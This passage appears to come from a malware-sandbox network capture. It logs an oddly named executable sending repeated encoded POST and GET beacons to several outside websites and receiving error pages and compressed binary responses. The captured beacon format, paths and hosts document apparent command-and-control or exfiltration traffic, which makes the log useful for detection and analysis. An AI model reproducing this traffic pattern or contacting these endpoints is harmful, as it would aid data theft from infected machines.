Jul 3, 2024 08:35:15.643152952 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:35:15 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	61443	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:17.331293106 CEST	790	OUT	POST /9285/ HTTP/1.1 Host: www.artemhypnotherapy.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.artemhypnotherapy.com Referer: http://www.artemhypnotherapy.com/9285/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 33 37 48 50 51 46 4a 70 4e 53 61 52 37 4b 54 65 50 30 36 36 67 66 43 38 48 78 67 63 32 63 6c 54 4d 6f 70 75 36 79 47 71 2b 56 53 2f 55 51 61 6f 4d 58 45 69 73 4f 69 71 68 63 54 6e 64 52 73 74 70 61 43 68 6c 32 58 63 53 5a 68 77 4c 32 70 79 2b 71 37 67 79 31 34 61 63 4f 46 2f 4d 78 48 6a 4a 51 70 7a 47 57 6d 47 50 63 50 53 62 66 69 67 65 79 36 57 69 47 56 52 31 4f 6d 58 4b 6a 36 33 51 4e 61 61 53 66 38 32 76 75 75 7a 64 6a 56 55 38 72 68 6c 74 47 68 5a 5a 4a 70 50 58 68 5a 50 34 70 64 6c 51 70 75 4a 69 77 67 39 6f 48 41 61 70 77 41 53 59 57 2f 48 4a 56 52 4b 49 6e 41 32 4b 43 63 35 31 2f 36 35 35 31 45 58 79 43 68 76 Data Ascii: iJiX_=+6kxNYcNLa9o37HPQFJpNSaR7KTeP066gfC8Hxgc2clTMopu6yGq+VS/UQaoMXEisOiqhcTndRstpaChl2XcSZhwL2py+q7gy14acOF/MxHjJQpzGWmGPcPSbfigey6WiGVR1OmXKj63QNaaSf82vuuzdjVU8rhltGhZZJpPXhZP4pdlQpuJiwg9oHAapwASYW/HJVRKInA2KCc51/6551EXyChv
Jul 3, 2024 08:35:17.965835094 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:35:17 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	61444	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:19.870652914 CEST	1807	OUT	POST /9285/ HTTP/1.1 Host: www.artemhypnotherapy.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.artemhypnotherapy.com Referer: http://www.artemhypnotherapy.com/9285/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 33 37 48 50 51 46 4a 70 4e 53 61 52 37 4b 54 65 50 30 36 36 67 66 43 38 48 78 67 63 32 61 39 54 50 62 68 75 37 54 47 71 39 56 53 2f 64 77 61 6c 4d 58 45 46 73 4e 53 51 68 63 66 64 64 53 45 74 70 2f 57 68 69 44 6a 63 62 5a 68 77 44 57 70 7a 67 61 36 6b 79 31 6f 65 63 4f 56 2f 4d 78 48 6a 4a 57 56 7a 57 7a 53 47 4e 63 50 52 4d 76 69 73 61 79 36 36 69 46 6c 76 31 4f 71 74 4b 54 61 33 51 74 4b 61 65 4e 55 32 79 65 75 78 52 44 56 4d 38 72 74 36 74 47 39 76 5a 4a 64 31 58 68 68 50 37 4d 52 6d 48 4a 53 51 30 54 45 30 73 6d 77 64 6e 47 49 53 61 56 76 7a 4b 31 42 55 45 42 49 47 4b 67 63 4b 2b 34 37 6a 73 78 6b 41 2f 32 5a 6b 65 74 72 4f 49 45 47 79 2f 6f 2b 5a 79 36 2b 74 70 4c 45 4e 72 4f 4c 79 71 38 66 61 4d 77 31 33 32 69 79 77 6f 34 65 49 47 6e 65 68 38 69 77 51 74 54 76 36 50 38 35 2f 79 79 43 6d 6d 76 79 45 46 4f 41 61 75 74 74 38 76 38 78 30 35 31 48 65 72 4d 51 43 36 65 50 68 78 32 35 54 77 67 39 43 4f 79 75 51 66 7a 4b 38 6c 33 71 7a 4b 71 71 42 [TRUNCATED] Data Ascii: iJiX_=+6kxNYcNLa9o37HPQFJpNSaR7KTeP066gfC8Hxgc2a9TPbhu7TGq9VS/dwalMXEFsNSQhcfddSEtp/WhiDjcbZhwDWpzga6ky1oecOV/MxHjJWVzWzSGNcPRMvisay66iFlv1OqtKTa3QtKaeNU2yeuxRDVM8rt6tG9vZJd1XhhP7MRmHJSQ0TE0smwdnGISaVvzK1BUEBIGKgcK+47jsxkA/2ZketrOIEGy/o+Zy6+tpLENrOLyq8faMw132iywo4eIGneh8iwQtTv6P85/yyCmmvyEFOAautt8v8x051HerMQC6ePhx25Twg9COyuQfzK8l3qzKqqBiYiO3d/Ri1S794WuYcBZ4LjOqft9Pxht2OTwnRpsH6A91T8I25e904KcC7oFc6PHIYl3waA35G7RW6Skz919RQr4NiKZ1u6EwRIQNs4yfiizUZMenYE1KJYLoY/bTKZg/ktUYLsj8fdlHLjeKfZznnpDZgEgy1dLQ+JhVuFGF5bD/JKKrCcuPpkxuCAhn/+qDvdygIZuvET5vPQYmKN8Fqgt9SoJUTj0PjSaO2SxHBYwr6rhzDOMVMYF/OJN244ro/XkfOb/HwRftzokEH1Z3aMvGPo7n/Vf1mgVDE6KpOWV6duFO/u049bbTHefljVq4JEaj329wTamVjru9fcFJXQ9Bz3A1ac+68dVxwRSVwbfsscnoBH1T3DFS/kodMdp7yhkkXIuIEmFWnL5y3tdOPvah7jmK42FsIdKELqUSiv/eIDOtoORv540GxodYqEpYZO0fn8iww9dBbXPInzVIOWVvfEMh+nSYEt6IHSQ7AS3EMpSZ0sRRXSzw/GjcHJ79EH8P0iAJIdHnOrYizVCiM4eYKwEOCOj5s3Yiy1B4wotjveERL1e7Vvb5jrcypm9bfVE5/iDRS3MyUdEdk4mtcZGH+eyIzk1uPCseJSUcT3Pnaoi4UgRm2QCyH3wGMV/PuhKWtIkr7+U41hkJEW4QoXE7mVTP1OHrM [TRUNCATED]
Jul 3, 2024 08:35:20.505794048 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:35:20 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	61445	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:22.399810076 CEST	488	OUT	GET /9285/?eZ=3HYLM&iJiX_=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuToN1NFxkjKaOlloDdIBhV0y8LTNSISuvKrOWF9neSWjDzw== HTTP/1.1 Host: www.artemhypnotherapy.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:35:23.047919035 CEST	113	IN	HTTP/1.1 439 date: Wed, 03 Jul 2024 06:35:22 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	61446	109.95.158.122	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:36.240628958 CEST	734	OUT	POST /prg5/ HTTP/1.1 Host: www.mocar.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.mocar.pro Referer: http://www.mocar.pro/prg5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 55 54 44 64 38 75 65 6f 4c 64 4c 44 45 6d 38 50 39 6f 36 4e 78 42 49 44 5a 6f 4d 51 6b 43 64 64 4a 47 6d 4f 64 50 4f 49 59 65 65 71 69 6b 37 58 55 58 65 4c 66 46 64 43 4b 4f 31 2f 77 48 66 58 2b 35 6d 2f 71 7a 43 52 44 7a 53 48 32 68 49 41 6f 63 49 38 69 6c 32 45 5a 74 75 71 66 75 48 2f 37 70 45 39 64 43 31 67 55 50 6e 6b 71 61 30 61 4b 70 79 72 71 53 2b 6e 79 52 2b 6a 67 54 7a 45 33 6a 4e 39 30 53 48 58 75 50 69 61 52 7a 49 68 53 41 41 6c 78 32 31 66 6e 6a 44 70 65 75 54 42 62 6b 4d 53 59 46 71 4b 61 49 4e 62 32 41 51 6e 4b 31 37 73 6d 69 55 6f 64 4b 45 3d Data Ascii: iJiX_=DW+FCkdcSeqSUTDd8ueoLdLDEm8P9o6NxBIDZoMQkCddJGmOdPOIYeeqik7XUXeLfFdCKO1/wHfX+5m/qzCRDzSH2hIAocI8il2EZtuqfuH/7pE9dC1gUPnkqa0aKpyrqS+nyR+jgTzE3jN90SHXuPiaRzIhSAAlx21fnjDpeuTBbkMSYFqKaINb2AQnK17smiUodKE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	61447	109.95.158.122	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:38.778768063 CEST	754	OUT	POST /prg5/ HTTP/1.1 Host: www.mocar.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.mocar.pro Referer: http://www.mocar.pro/prg5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 33 74 64 4a 6d 57 4f 65 4b 69 49 56 2b 65 71 36 55 37 53 62 33 65 45 66 46 68 37 4b 50 4a 2f 77 47 37 58 2b 34 57 2f 71 41 61 53 52 54 53 4a 37 42 49 43 6c 38 49 38 69 6c 32 45 5a 70 47 41 66 71 54 2f 37 63 4d 39 64 6a 31 68 63 76 6e 6e 72 61 30 61 4f 70 79 6e 71 53 2f 4b 79 56 32 4e 67 52 4c 45 33 68 6c 39 36 6a 48 55 37 2f 69 59 4d 44 4a 6c 55 42 30 76 31 55 68 65 75 56 72 76 41 63 44 72 65 53 68 34 43 6e 69 4d 5a 49 6c 77 32 44 34 52 50 43 6d 45 38 42 45 59 44 64 51 4d 4e 4c 4a 66 72 6a 62 4f 63 46 4b 45 36 6d 77 6d 77 73 4b 42 Data Ascii: iJiX_=DW+FCkdcSeqSGjTd5PeoaNLMBm8PmY7ExA0DZpJNj3tdJmWOeKiIV+eq6U7Sb3eEfFh7KPJ/wG7X+4W/qAaSRTSJ7BICl8I8il2EZpGAfqT/7cM9dj1hcvnnra0aOpynqS/KyV2NgRLE3hl96jHU7/iYMDJlUB0v1UheuVrvAcDreSh4CniMZIlw2D4RPCmE8BEYDdQMNLJfrjbOcFKE6mwmwsKB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	61448	109.95.158.122	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:41.305214882 CEST	1771	OUT	POST /prg5/ HTTP/1.1 Host: www.mocar.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.mocar.pro Referer: http://www.mocar.pro/prg5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 32 35 64 49 56 75 4f 5a 64 32 49 55 2b 65 71 33 30 37 54 62 33 65 6a 66 46 49 7a 4b 50 45 41 77 46 54 58 2b 61 65 2f 37 68 61 53 62 54 53 4a 6e 78 49 48 6f 63 4a 6f 69 6d 66 44 5a 74 71 41 66 71 54 2f 37 64 38 39 4e 69 31 68 61 76 6e 6b 71 61 31 49 4b 70 79 4c 71 54 58 30 79 56 36 7a 67 46 33 45 75 42 31 39 32 77 76 55 6e 76 69 47 63 54 4a 44 55 42 70 31 31 58 46 34 75 52 6a 4a 41 65 54 72 64 30 30 38 47 55 75 54 4b 4c 64 67 33 6b 34 6b 42 78 61 35 69 58 63 58 4f 65 30 44 4b 63 55 30 73 67 62 67 57 55 58 61 6f 42 6f 53 68 4b 62 57 42 64 6d 54 77 72 75 64 74 57 4b 43 6b 4f 69 62 75 77 44 79 4b 59 4a 64 72 74 30 5a 52 48 6c 35 49 57 36 6d 33 56 48 6d 73 50 6a 4c 76 4e 4c 73 70 4e 57 4a 37 79 61 30 4b 62 41 49 59 6b 6c 68 54 41 4f 42 6d 4b 38 76 53 61 66 63 73 4e 62 4d 55 2b 55 79 68 38 4f 58 7a 48 37 59 67 65 68 4a 62 36 6f 6f 48 4f 62 34 71 39 79 74 68 51 44 62 [TRUNCATED] Data Ascii: iJiX_=DW+FCkdcSeqSGjTd5PeoaNLMBm8PmY7ExA0DZpJNj25dIVuOZd2IU+eq307Tb3ejfFIzKPEAwFTX+ae/7haSbTSJnxIHocJoimfDZtqAfqT/7d89Ni1havnkqa1IKpyLqTX0yV6zgF3EuB192wvUnviGcTJDUBp11XF4uRjJAeTrd008GUuTKLdg3k4kBxa5iXcXOe0DKcU0sgbgWUXaoBoShKbWBdmTwrudtWKCkOibuwDyKYJdrt0ZRHl5IW6m3VHmsPjLvNLspNWJ7ya0KbAIYklhTAOBmK8vSafcsNbMU+Uyh8OXzH7YgehJb6ooHOb4q9ythQDbZeVpWIGB2EffPd6RryMmzUun68ngyB5TRENjvvKtA9FWOoA4G78uNYcyYdILhQLUNjXlsymSLxwdqaXPz0cp/3ht/5KOFZdwo0lT4DqXonWdPcQiaeZ7cyt5Rz4HP8TeqWVvtrW8tKTLJiF64+G2yrqYfjD1ejM4e2nacX3ylv0EVeWlVwp76sDS2hhavcWJe09cnAWeknnpZ6aXND0o5MiHSXXU6vVefg9UrfSARoXN6b1/505dpZm21tjV5JaXxptYW/v6/9cJLPE7HKxeZkN/QBnFrUbBTETcZKQEkUahbt2b/Zvl9qNUo8A0xjpY285S4hwiWkhvZ74yZIsixE/4kA0bf2eHWOFXWTm319rOVjrolIPLpJaMK6OlHuuvgVcYVT8088QjFFB9eCaXJPHn/ESM9QES8nJpbvAuCbIRJmxZ49vd60/Qvo7bJ0mFEkhPlVPitBiOoD70M/KLIqxNqd5R0ym6DLxUP7UPteCzVXNKJij0IApTi/9NRr91WbCX0Pt22ITv0hHeFrlJUdJVxXBfSZDDWiuZUuKuJhD/6xX6GuMkJT6+aP4Rqy6I6Np0uL1n7D0TUhKlXXJVhXz+tlKtnoPSgq7dAnDfsPCf/6X5z7ObSetk/gscaSjejzuTWMNCBFYK2ZAiddDBWtdQyEaRL/Pqdh [TRUNCATED]
Jul 3, 2024 08:35:42.613146067 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-litespeed-tag: 39e_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/" x-et-api-version: v1 x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/ x-et-api-origin: https://mocar.pro x-tec-api-version: v1 x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/ x-tec-api-origin: https://mocar.pro x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 03 Jul 2024 06:35:42 GMT server: LiteSpeed Data Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b [TRUNCATED] Data Ascii: 23cd"j=QsfoA9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0FXUC?=E4a%.SA/Jd\|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh\|c,8bem67.#N;1x3@n}D5uN\|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
Jul 3, 2024 08:35:42.613172054 CEST	1236	IN	Data Raw: f4 a1 2d 3f b2 33 4d 99 55 3e 40 99 11 f8 06 cb 6c 7e 26 73 79 52 66 17 8b fd c5 a2 cc a8 a0 b0 47 5a d0 61 36 2e 02 41 e3 b6 a5 d9 2b 6e db d3 e0 b8 6d 1f 5f cf 8b db 7d f9 4d a8 80 16 03 ad bc ab 34 a2 72 1e ec 20 95 31 b6 cc 76 7d 9a b7 0c 2a Data Ascii: -?3MU>@l~&syRfGZa6.A+nm_}M4r 1v}*8<4AvxwA3yFq9~6cH}@~d2#:/b~&gcb=}61>#tqi9~8j{Tr
Jul 3, 2024 08:35:42.613185883 CEST	1236	IN	Data Raw: ff e3 1e 32 30 5f a4 88 07 0b 71 0d 80 33 62 6a 35 c3 60 56 90 c2 16 1c c6 b4 0f 3e ed 8c 33 a9 dd 14 9b ae ac af 6e 52 c4 a1 69 15 a3 4d ca 8c 03 d5 46 ea d2 a7 56 6e 34 9b 11 c2 09 4b 7a db e9 83 cf 62 a8 b2 00 26 c7 0a 8e 59 15 63 26 04 b3 2a Data Ascii: 20_q3bj5`V>3nRiMFVn4Kzb&Yc&*TX-Aikmh&'IjKdrdV4vA=&GG]DeFnVyjd+L75 9e~IsIX"-\H$2>w}mUa9o_8
Jul 3, 2024 08:35:42.613199949 CEST	672	IN	Data Raw: 0a 24 4e 6d 57 d1 24 09 b3 c4 fe fc d1 ad 9f 9f b1 cf 85 49 d0 97 9c f7 17 46 4b db fe 3e 61 e8 58 59 34 b4 c0 dd c9 14 8d 5e 8a c1 eb 1b 2b 28 05 f7 79 0e 6d 19 2d 6d bb 61 a3 a5 6d d4 29 93 76 ec 1a 31 9c 8d fe 00 c6 88 d2 b5 63 7d e3 31 c0 1e Data Ascii: $NmW$IFK>aXY4^+(ym-mam)v1c}1~f})-EhVKKhEI]* OhXkq47D!\|Tb;1.Pv_9Wktu#E3DStF`;ZIV\A4}_Vk*W7NFRZ9F
Jul 3, 2024 08:35:42.613214016 CEST	1236	IN	Data Raw: 3d 73 73 91 1e 7c 0d 51 b4 67 ff b8 4e de b7 57 eb 1b 15 a5 d6 b1 bf 94 80 a2 38 a3 e1 41 9c 8d d2 39 aa 61 8f c5 c1 2d 4d c2 63 d6 3a 68 2d 91 6b d4 62 0c 26 24 cb 3f d6 11 5a 6b e0 7f ab cd e0 e7 05 b7 a6 9d 1b 59 c7 0e ed 31 6c fb 14 41 d3 b2 Data Ascii: =ss\|QgNW8A9a-Mc:h-kb&$?ZkY1lA_JaNSEDeEZ9`2^\|,Az'K[t^\|zuX}y=%2knxr_1d5LbX"i9f$yL1J4""qZf_.^)Hk
Jul 3, 2024 08:35:42.613225937 CEST	1236	IN	Data Raw: 3f 87 a0 29 91 01 d3 c3 61 80 d7 0a da 39 b6 53 79 e6 70 cd fe fc f8 90 a2 ea d8 1a ed f3 f7 33 6b 64 15 c7 4f 69 0d d6 a3 4e 2f b2 94 f5 4b 29 5e a6 db 16 09 ff a6 69 b5 18 8b ab 1f 47 f9 fd de 0c 73 20 e6 e7 ef 3f fb be f0 c7 87 07 2c da a6 3d Data Ascii: ?)a9Syp3kdOiN/K)^iGs ?,=sJQ2NY['_Qho!^,)&-$o<'4;1V}&<K2M<[a;Tp$UM)4[C,6jFos
Jul 3, 2024 08:35:42.613238096 CEST	1236	IN	Data Raw: dc ab 8a 04 03 9a 3d fd ae 1b 4d 03 b6 5b 0e 40 30 93 62 bd 3c 12 6a 58 7c 4c b0 71 28 a0 c9 81 be be 7f 68 b3 00 9a 35 ed 3d 63 1c c0 03 39 83 52 e0 60 26 cb 4e d7 f0 bf 71 1e 70 a2 87 0e 08 fd 23 0c d9 5a 05 2f 86 09 fd 2b 68 20 5d 05 5f d8 05 Data Ascii: =M[@0b<jX\|Lq(h5=c9R`&Nqp#Z/+h ]_8Xu@&j".^KV]VM2?c,M@8Fp30a=z!',<AM41GRHdPq8(~!zF%N @B
Jul 3, 2024 08:35:42.613251925 CEST	1236	IN	Data Raw: 31 9c 10 78 3a e2 0c fa e6 70 31 0a fa 3f fb 2a 80 83 55 d2 76 4e 04 10 78 f2 6f 39 9e 96 81 74 50 72 52 07 84 9c 34 d4 99 19 7e 4d 01 6c 50 c0 49 14 56 b8 e0 20 18 89 46 2d 93 e6 37 00 14 c6 8d bc 98 ce b8 f8 42 a7 b4 5d 64 14 68 dd 2e c8 9a 7e Data Ascii: 1x:p1?UvNxo9tPrR4~MlPIV F-7B]dh.~&d}}hR4.8SH\6wkvOGXV9J-._oV-6RI4/r-8k_Q8\|pCBl_"6h{}@6ux@
Jul 3, 2024 08:35:42.613316059 CEST	524	IN	Data Raw: 94 43 0f 6c 29 ef 10 d0 5e 5a 76 b9 63 ad 0f a5 e0 53 26 0d bd 28 77 df fa 3c 36 a4 a2 d5 79 e1 07 d8 ba 70 a2 5f 01 69 18 6e c7 42 ea a2 d8 63 29 46 64 f4 af 49 93 72 5a 30 43 29 b7 ba 0c 64 b8 fa f7 4a b0 7d ae 54 90 f0 3e 80 f2 00 c7 8c 55 16 Data Ascii: Cl)^ZvcS&(w<6yp_inBc)FdIrZ0C)dJ}T>U z=&8Zt\|40Y7KGQx\|GzPh?7hFwKADz:743QtQ4{izPFV:kLI5f~90`xnCD
Jul 3, 2024 08:35:42.613398075 CEST	1236	IN	Data Raw: 31 32 61 66 0d 0a 3a 75 0e 44 14 f4 21 a0 08 19 e6 7e a9 45 d6 9b a6 f2 5c f5 92 bf ba af 6a f2 68 90 84 6d 62 04 3a 81 ec f5 ed c4 17 f7 d6 fb 9c 05 13 d9 52 6a 29 b6 2c f9 a6 f5 8a 2a a5 61 a1 74 7c 94 3a 93 3a 2f ad ee b2 7d ec 6d f2 db 72 f6 Data Ascii: 12af:uD!~E\jhmb:Rj),*at\|::/}mr}:>CN1fx$Elwh6ZFv#K;Z+iz8 OJ +e?]C'=k(k`IMArpT!!
Jul 3, 2024 08:35:42.619007111 CEST	1236	IN	Data Raw: 50 f8 13 0a 3f 13 ca 41 8b 15 04 09 bd f5 c8 98 ed e6 40 18 02 47 a7 81 61 76 72 87 5f 66 a2 dd 85 a7 f2 49 c3 51 8a 93 02 1e 27 d9 e1 d0 4b 96 79 56 05 10 98 c5 aa b1 d0 cb 74 20 d6 3a 9e d8 2b 3b 60 ad 45 0a 9b d9 d0 0b 26 47 9f 6a f3 03 a5 e2 Data Ascii: P?A@Gavr_fIQ'KyVt :+;`E&Gjq?a`*liHSqT5"qBel9hhy$YQ8,^~B4"z+k@Hv(;bICW"tES`'E50[2)%\|+"j

